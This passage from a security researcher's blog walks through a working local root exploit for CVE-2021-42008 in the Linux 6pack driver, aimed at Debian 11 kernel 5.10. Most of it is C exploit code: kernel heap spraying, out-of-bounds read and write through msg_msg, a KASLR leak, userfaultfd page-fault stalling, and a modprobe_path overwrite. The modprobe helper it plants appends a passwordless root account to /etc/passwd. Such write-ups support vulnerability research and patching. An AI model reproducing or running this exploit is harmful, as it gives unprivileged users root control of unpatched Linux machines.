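The payload offsets match those used by generate_payload() later in this article. The simulation also checks that buff[0x1a6] lands at offset 0x19 of the next object, which is the second byte of msg_msg.m_ts.

```python
OFF_RX_COUNT = 0x190         # sp->rx_count, as an index into cooked_buf
OFF_RX_COUNT_COOKED = 0x194  # sp->rx_count_cooked, as an index into cooked_buf
NEXT_OBJECT = 0x688          # start of the next kmalloc-4k object


def load_u32(mem, off):
    return int.from_bytes(mem[off:off + 4], "little")


def store_u32(mem, off, value):
    mem[off:off + 4] = value.to_bytes(4, "little")


def decode_data_compiled(mem, c0, c1, c2):
    """Write one decoded triplet in the order used by the compiled decode_data()."""
    idx = load_u32(mem, OFF_RX_COUNT_COOKED)      # [1] [2] index read once
    mem[idx] = c0                                 # [3]
    mem[idx + 1] = c1                             # [4]
    store_u32(mem, OFF_RX_COUNT_COOKED, idx + 3)  # [5] index updated early
    mem[idx + 2] = c2                             # [6] may overwrite the index
    store_u32(mem, OFF_RX_COUNT, 0)               # sp->rx_count = 0


def run(decoded):
    """Feed decoded bytes three at a time; return memory and index after each call."""
    mem = bytearray(0x1000)  # offsets relative to sp->cooked_buf
    trace = []
    for i in range(0, len(decoded) - len(decoded) % 3, 3):
        decode_data_compiled(mem, *decoded[i:i + 3])
        trace.append(load_u32(mem, OFF_RX_COUNT_COOKED))
    return mem, trace


buff = bytearray(0x1b0)
buff[0x194] = 0x90  # rx_count_cooked = 0x190 (misaligned frame)
buff[0x19a] = 0x06  # rx_count_cooked = 0x696
buff[0x1a6] = 0x11  # second byte of msg_msg.m_ts (object offset 0x19)

mem, trace = run(buff)
print([hex(v) for v in trace[133:137]])  # ['0x192', '0x190', '0x193', '0x696']
print(hex(mem[NEXT_OBJECT + 0x19]))      # 0x11
```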

This tricks decode_data() into writing the rest of the payload starting 0x0e bytes into the next object in memory (0x696 - 0x688 = 0xe). At this point we can start writing our exploit:

void prepare_exploit()
{
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/asd");
    system("chmod +x /tmp/asd");
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'chmod +s /bin/su' >> /tmp/x"); // Needed for busybox, just in case
    system("echo 'echo \"pwn::0:0:pwn:/root:/bin/sh\" >> /etc/passwd' >> /tmp/x"); // [4]
    system("chmod +x /tmp/x");

    memcpy(buff2 + 0xfc8, "/tmp/x\00", 7);
}


void assign_to_core(int core_id)
{
    cpu_set_t mask;
    pid_t pid;

    pid = getpid();

    printf("[*] Assigning process %d to core %d\n", pid, core_id);

    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);

    if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0) // [2]
    {
        perror("[X] sched_setaffinity()");
        exit(1);
    }

    print_affinity();
}

[...]

assign_to_core(0); // [1]
prepare_exploit(); // [3]

[...]

We are working in an SMP environment, and with the SLUB allocator active slabs are managed per CPU (see kmem_cache_cpu). To maximize the success rate of our exploit, we must always operate on the same processor. We can do this by assigning the current process to core 0 [1] using sched_setaffinity() [2], which unprivileged users can call.

Then we call prepare_exploit() to prepare everything we need to exploit modprobe [3] (Check References to learn more about this technique or read my Hotrod writeup).

As you can see, once executed by the kernel, the program will add a new user with root privileges [4].

void alloc_msg_queue_A(int id)
{
    if ((qid_A[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("[X] msgget");
        exit(1);
    }
}


void send_msg(int qid, int size, int type, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = type;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("[X] msgsnd");
        exit(1);
    }
}


void *recv_msg(int qid, size_t size, int type)
{
    // msgrcv() stores the long mtype before the size bytes of mtext
    void *memdump = malloc(sizeof(long) + size);

    if (msgrcv(qid, memdump, size, type, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) < 0)
    {
        perror("[X] msgrcv");
        free(memdump);
        return NULL;
    }

    return memdump;
}


void alloc_shm(int i)
{
    shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);

    if (shmid[i]  < 0)
    {
        perror("[X] shmget fail");
        exit(1);
    }

    shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);

    if (shmaddr[i] == (void *)-1) // shmat() returns (void *)-1 on failure
    {
        perror("[X] shmat");
        exit(1);
    }
}

[...]

puts("[*] Spraying shm_file_data in kmalloc-32...");
for (int i = 0; i < 100; i++)
    alloc_shm(i); // [1]

puts("[*] Spraying messages in kmalloc-4k...");
for (int i = 0; i < N_MSG; i++)
    alloc_msg_queue_A(i); // [2]

for (int i = 0; i < N_MSG; i++)
    send_msg(qid_A[i], 0x1018, 1, 'A' + i); // [3]

recv_msg(qid_A[0], 0x1018, 0); // [4]
ptmx = init_sixpack(); // [5]

[...]

We continue by spraying many shm_file_data structures in kmalloc-32:

struct shm_file_data {
    int id;
    struct ipc_namespace *ns;
    struct file *file;
    const struct vm_operations_struct *vm_ops;
};

This can be done using shmget() to allocate a shared memory segment and shmat() to attach it to the address space of the calling process [1]. This, later on, will allow us to leak the init_ipc_ns symbol, located in the kernel data section, calculate the kernel base address, and bypass KASLR.

Afterwards, we allocate N_MSG (in this case N_MSG is equal to 6) message queues [2] and then for each queue we send a message of 0x1018 bytes (0xfe8 bytes for message body, and 0x30 for message header) using send_msg() [3], a msgsnd() wrapper. Each iteration will allocate a message in kmalloc-4k and a segment in kmalloc-32.
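The split between kmalloc-4k and kmalloc-32 follows from how alloc_msg() chunks a message. The first DATALEN_MSG = PAGE_SIZE - sizeof(struct msg_msg) bytes live in the msg_msg object. The rest goes into msg_msgseg segments, each holding up to PAGE_SIZE - sizeof(struct msg_msgseg) bytes. Here is a Python sketch of that arithmetic, assuming x86-64 structure sizes (0x30 for msg_msg, 0x8 for msg_msgseg):

```python
PAGE_SIZE = 0x1000
SIZEOF_MSG_MSG = 0x30     # x86-64: m_list 16 + m_type 8 + m_ts 8 + next 8 + security 8
SIZEOF_MSG_MSGSEG = 0x8   # x86-64: a single next pointer
DATALEN_MSG = PAGE_SIZE - SIZEOF_MSG_MSG
DATALEN_SEG = PAGE_SIZE - SIZEOF_MSG_MSGSEG


def msg_allocations(body_len):
    """Sizes passed to kmalloc() for a message body of body_len bytes."""
    first = min(body_len, DATALEN_MSG)
    sizes = [SIZEOF_MSG_MSG + first]
    left = body_len - first
    while left > 0:
        chunk = min(left, DATALEN_SEG)
        sizes.append(SIZEOF_MSG_MSGSEG + chunk)
        left -= chunk
    return sizes


# send_msg(qid, 0x1018, ...) sends a 0x1018 - 0x30 = 0xfe8-byte body
print([hex(s) for s in msg_allocations(0x1018 - 0x30)])  # ['0x1000', '0x20']
```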

PS: Here I only used 6 messages because the testing environment was virtually noiseless. On other systems you may want to use more message queues and spray more messages to saturate kmalloc-4k partial slabs first.

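Then we use recv_msg(), a msgrcv() wrapper, to create a hole in the kernel heap [4]. Because of MSG_COPY, the message stays in its queue. The free kmalloc-4k slot instead comes from the temporary copy that the kernel allocates and frees while serving the request. At this point we can finally initialize the sixpack channel, as we have seen in the first section [5]. This allocates a net_device structure in kmalloc-4k, with a sixpack structure inside its private data region.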

All this will create the following situation in memory, where the sixpack structure is followed by one of the messages. This message contains a pointer to its respective segment in kmalloc-32:

It is important to note that we don’t know which queue the message allocated after the sixpack structure belongs to, so I identified the queue with QID #X.

We are finally ready to send our malicious payload over the sixpack channel:

uint8_t *sixpack_encode(uint8_t *src)
{
    uint8_t *dest = (uint8_t *)calloc(1, 0x3000);
    uint32_t raw_count = 2; // [8]

    for (int count = 0; count <= PAGE_SIZE; count++)
    {
        if ((count % 3) == 0)
        {
            dest[raw_count++] = (src[count] & 0x3f);
            dest[raw_count] = ((src[count] >> 2) & 0x30);
        }
        else if ((count % 3) == 1)
        {
            dest[raw_count++] |= (src[count] & 0x0f);
            dest[raw_count] =    ((src[count] >> 2) & 0x3c);
        }
        else
        {
            dest[raw_count++] |= (src[count] & 0x03);
            dest[raw_count++] = (src[count] >> 2);
        }
    }

    return dest;
}


uint8_t *generate_payload(uint64_t target)
{
    uint8_t *encoded;

    memset(buff, 0, PAGE_SIZE);

    // sp->rx_count_cooked = 0x190
    buff[0x194] = 0x90; // [2]

    // sp->rx_count_cooked = 0x696
    buff[0x19a] = 0x06; // [3]

    // fix two upper bytes of msg_msg.m_list.prev
    buff[0x19b] = 0xff; // [4]
    buff[0x19c] = 0xff;

    // msg_msg.m_ts = 0x1100
    buff[0x1a6] = 0x11; // [5]

    // msg_msg.next = target
    if (target) // [6]
        for (int i = 0; i < sizeof(uint64_t); i++)
            buff[0x1ad + i] = (target >> (8 * i)) & 0xff;

    encoded = sixpack_encode(buff);

    // sp->status = 0x18 (to reach decode_data())
    encoded[0] = 0x88; // [7]
    encoded[1] = 0x98;

    return encoded;
}

[...]

payload = generate_payload(0); // [1]
write(ptmx, payload, LEAK_PAYLOAD_SIZE); // [9]

[...]

We generate and encode our malicious payload by calling generate_payload() [1]. As we have seen in the previous paragraphs, we misalign the writing frame of the decode_data() function by setting sp->rx_count_cooked to 0x190 [2].

We then overwrite the second byte of sp->rx_count_cooked with 0x06, making it 0x696 [3]. From this point on, decode_data() will continue writing data at sp->cooked_buf[0x696], and by doing so it will inevitably corrupt the two upper bytes of the msg_msg.m_list.prev pointer. Since the two upper bytes of a kernel heap pointer are always 0xffff, we can easily repair them [4].

Then we set msg_msg.m_ts to 0x1100 [5]; this will give us an Out-Of-Bounds Read primitive when calling recv_msg(). For now we don’t need to overwrite msg_msg.next [6], so we can directly encode our buffer and set the first two bytes of the payload to 0x88 and 0x98 respectively [7], to reach the vulnerable function.

Since the first two bytes of the encoded payload are reserved for these commands, sixpack_encode() starts writing the encoded data at index 2 (raw_count = 2) [8].

Once we send our malicious payload over the sixpack channel [9], it will be decoded by sixpack_decode() resulting in the following situation in memory:

We have successfully overwritten sp->rx_count_cooked with 0x696 by exploiting the buffer overflow in sp->cooked_buf, and tricked decode_data() into writing our malicious payload at sp->cooked_buf[0x696].

By doing so, we have successfully overwritten the m_ts field of the message. Here is the result of our Out-Of-Bounds Write primitive, as shown in GDB:

We can now proceed to exploit the Out-Of-Bounds Read:

void close_queue(int qid)
{
    if (msgctl(qid, IPC_RMID, NULL) < 0)
    {
        perror("[X] msgctl()");
        exit(1);
    }
}


int find_message_queue(uint16_t tag)
{
    switch (tag)
    {
        case 0x4141: return 0;
        case 0x4242: return 1;
        case 0x4343: return 2;
        case 0x4444: return 3;
        case 0x4545: return 4;
        case 0x4646: return 5;

        default: return -1;
    }
}


void leak_pointer(void)
{
    uint64_t *leak;

    for (int id = 0; id < N_MSG; id ++)
    {
        leak = (uint64_t *)recv_msg(qid_A[id], 0x1100, 0);

        if (leak == NULL)
            continue;

        for (int i = 0; i < 0x220; i++)
        {
            if ((leak[i] & 0xffff) == INIT_IPC_NS) // [2]
            {
                init_ipc_ns = leak[i];
                valid_qid = find_message_queue((uint16_t)leak[1]); // [3]
                modprobe_path = init_ipc_ns - 0x131040; // [4]
                return;
            }
        }
    }
}

[...]

leak_pointer(); // [1]

[...]

Since we don’t know which queue the message allocated after the sixpack structure belongs to, we use leak_pointer() [1] to read each message until the init_ipc_ns pointer is found [2]. If we find the pointer, we obtain the correct queue id by passing the message tag to find_message_queue() [3], and finally we compute the address of modprobe_path [4].

If the procedure fails, it means that none of our messages has been allocated after the sixpack structure. In this case we can simply launch the exploit again.

Here is a visual representation of what happens when we trigger the Out-Of-Bounds Read:

Now that we know the address of our target, modprobe_path, we need an arbitrary write primitive. We could initialize a new sixpack structure, but this would decrease the success rate of our exploit.

The question is: is there a way to reuse the sixpack structure we just corrupted? The answer is yes! Remember when we analyzed the tnc_init() function? Well, when a new sixpack channel is initialized, tnc_init() sets a timer of 5 seconds. When the timer fires, resync_tnc() is called:

static void resync_tnc(struct timer_list *t)
{
    struct sixpack *sp = from_timer(sp, t, resync_t);
    static char resync_cmd = 0xe8;

    /* clear any data that might have been received */

    sp->rx_count = 0; // [1]
    sp->rx_count_cooked = 0; // [2]

    /* reset state machine */

    sp->status = 1; // [3]

        [...]

    /* Start resync timer again -- the TNC might be still absent */
    mod_timer(&sp->resync_t, jiffies + SIXP_RESYNC_TIMEOUT); // [4]
}

As we can see, after 5 seconds the receiver state is reset: sp->rx_count and sp->rx_count_cooked are set to 0 [1] [2], sp->status is set to 1 [3], and then the 5-second timer is re-armed [4].

This means that we only need to wait 5 seconds for the receiver state to be reset; then we will be able to reuse the structure to cause a second Out-Of-Bounds Write.

We can now proceed to initialize N_THREADS page fault handler threads (in our case N_THREADS is equal to 8):

void create_pfh_thread(int id, int ufd, void *page)
{
    struct pfh_args *args = (struct pfh_args *)malloc(sizeof(struct pfh_args));

    args->id = id;
    args->ufd = ufd;
    args->page = page;

    pthread_create(&pfh_tid[id], NULL, page_fault_handler, (void *)args);
}

[...]

for (int i = 0; i < N_THREADS; i++) // [1]
{
    mmap(pages[i], PAGE_SIZE*3, PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    ufd[i] = initialize_ufd(pages[i]);
}


for (int i = 0; i < N_THREADS; i++)
    create_pfh_thread(i, ufd[i], pages[i]); // [2]

[...]

First, we call mmap() 8 times, each time mapping 3 pages of memory, and for each mapping we start monitoring the second page using userfaultfd [1]. Then, we start 8 page fault handlers [2]. Each of these threads will handle the page fault for a specific page.

We then allocate 8 messages in kmalloc-4k and the respective segments in kmalloc-32:

void alloc_msg_queue_B(int id)
{
    if ((qid_B[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("[X] msgget");
        exit(1);
    }
}


void *allocate_msg(void *arg)
{
    int id = ((struct t_args *)arg)->id;
    void *page = ((struct t_args *)arg)->page;

    debug_printf("[Thread %d] Message buffer allocated at 0x%lx\n", id + 1, page + PAGE_SIZE - 0x10);
    alloc_msg_queue_B(id);

    memset(page, 0, PAGE_SIZE);
    ((uint64_t *)(page))[0xff0 / 8] = 1; // mtype = 1 (becomes msg_msg.m_type)

    if (msgsnd(qid_B[id], page + PAGE_SIZE - 0x10, 0x1018, 0) < 0) // [4]
    {
        perror("[X] msgsnd");
        exit(1);
    }

    debug_printf("[Thread %d] Message sent!\n", id + 1);
    return NULL;
}


void create_message_thread(int id, void *page)
{
    struct t_args *args = (struct t_args *)malloc(sizeof(struct t_args));

    args->id = id;
    args->page = page;

    pthread_create(&msg_tid[id], NULL, allocate_msg, (void *)args);
}

[...]

close_queue(qid_A[valid_qid]); // [1]
payload = generate_payload(modprobe_path - 0x8); // [2]

for (int i = 0; i < N_THREADS; i++)
    create_message_thread(i, pages[i]); // [3]

waitfor(6, "Waiting for resync_tnc callback..."); // [5]

[...]

First, we close the queue [1], freeing the message allocated after the sixpack structure along with its segment. This creates a hole in the heap, allowing us to allocate another message at the same location (because of the LIFO behavior of the freelist).

We regenerate our malicious payload, this time using modprobe_path - 0x8 as target [2]. This will set the msg_msg.next pointer to modprobe_path - 0x8. We subtract 8 bytes from modprobe_path because the first QWORD of a segment (its next pointer) must be NULL; otherwise load_msg() will try to access the next segment, causing a crash.

Afterwards, we create 8 threads using create_message_thread() [3]. Each of these threads will allocate a new message in kmalloc-4k. For each thread, we place the message buffer 0x10 bytes before the monitored page [4]; this way, the copy_from_user() call in load_msg() will cause a page fault, and we will be able to suspend the copy operation.

Finally, we sleep for 6 seconds [5], allowing resync_tnc() to reset the sixpack receiver state. All this will cause the following situation in memory:

As we can see, one of the messages has been allocated right after the sixpack structure. load_msg() caused a page fault, and we successfully suspended the copy operation. It is important to note that even in this case we don’t know which queue the message allocated after the sixpack structure belongs to, so I identified the queue with QID #Y.

We are ready to send our malicious payload over the sixpack channel:

[...]

puts("[*] Overwriting modprobe_path...");
write(ptmx, payload, WRITE_PAYLOAD_SIZE); // [1]

[...]

Once we send it [1], it will overwrite multiple fields of the msg_msg structure, including the next pointer. Now msg_msg->next points to modprobe_path - 0x8:

We can finally release all the suspended page faults:

[...]

release_pfh = true;

[...]

The modprobe_path string will be overwritten with the path of our malicious program "/tmp/x":

In the final stage, we trigger the call to modprobe and verify whether the new user with root privileges has been added:

[...]

system("/tmp/asd 2>/dev/null"); // [1]

if (!getpwnam("pwn")) // [2]
{
    puts("[X] Exploit failed, try again...");
    goto end;
}

puts("[+] We are root!");
system("rm /tmp/asd && rm /tmp/x");
system("su pwn");

[...]

First, we execute a file with an unknown binary format [1] (its first bytes match no registered binary handler), forcing the kernel into calling __request_module() → call_modprobe() → call_usermodehelper_exec() and executing our malicious program. Then we check whether the user pwn has been added [2] using getpwnam(). If the user exists, we can use su pwn to become root; otherwise we simply need to launch the exploit again.

Here is the exploit in action:

The complete exploit can be found here:

CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

The exploit is designed and tested for Debian 11 - Kernel 5.10.0-8-amd64. If you want to port the exploit to other kernel versions, remember that the distance between sp->cooked_buf and the next object in memory may change.

Conclusion

In this article I showed how the techniques presented by FizzBuzz101 and me in Fire Of Salvation and Wall Of Perdition can be used to exploit real vulnerabilities in the Linux Kernel.

There are many other valid approaches to exploit this vulnerability. For example, after Kernel 5.11, a first patch made userfaultfd completely inaccessible to unprivileged users, and a second patch restricted its usage so that only page faults from user mode can be handled. In the second stage, an attacker may therefore avoid userfaultfd and use FUSE to delay page faults (after creating unprivileged user and mount namespaces), or abuse discontiguous file mappings and scheduler behavior.

Another approach for the second stage may be to set msg_msg.next to the address of a previously leaked structure, for example seq_operations, subprocess_info, tty_struct and so on (check References for a list of exploitable kernel structures), and then free the message and its respective segment (now pointing to the target structure) using msgrcv() without the MSG_COPY flag.

This will result in an arbitrary free primitive. From here it is possible to cause a Use-After-Free and hijack the Kernel control flow by overwriting a function pointer.

Another very interesting approach is the one used to exploit CVE-2021-22555.

As always, for any question or clarification, feel free to contact me (check About).

References

6pack

https://docs.kernel.org/networking/6pack.html

The TTY demystified

https://www.linusakesson.net/programming/tty/index.php

Jiffies in the Linux Kernel

https://cyberglory.wordpress.com/2011/08/21/jiffies-in-linux-kernel/

Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)

modprobe_path

https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/

Exploitable kernel structures

https://bsauce.github.io/2021/09/26/kernel-exploit-%E6%9C%89%E7%94%A8%E7%9A%84%E7%BB%93%E6%9E%84%E4%BD%93/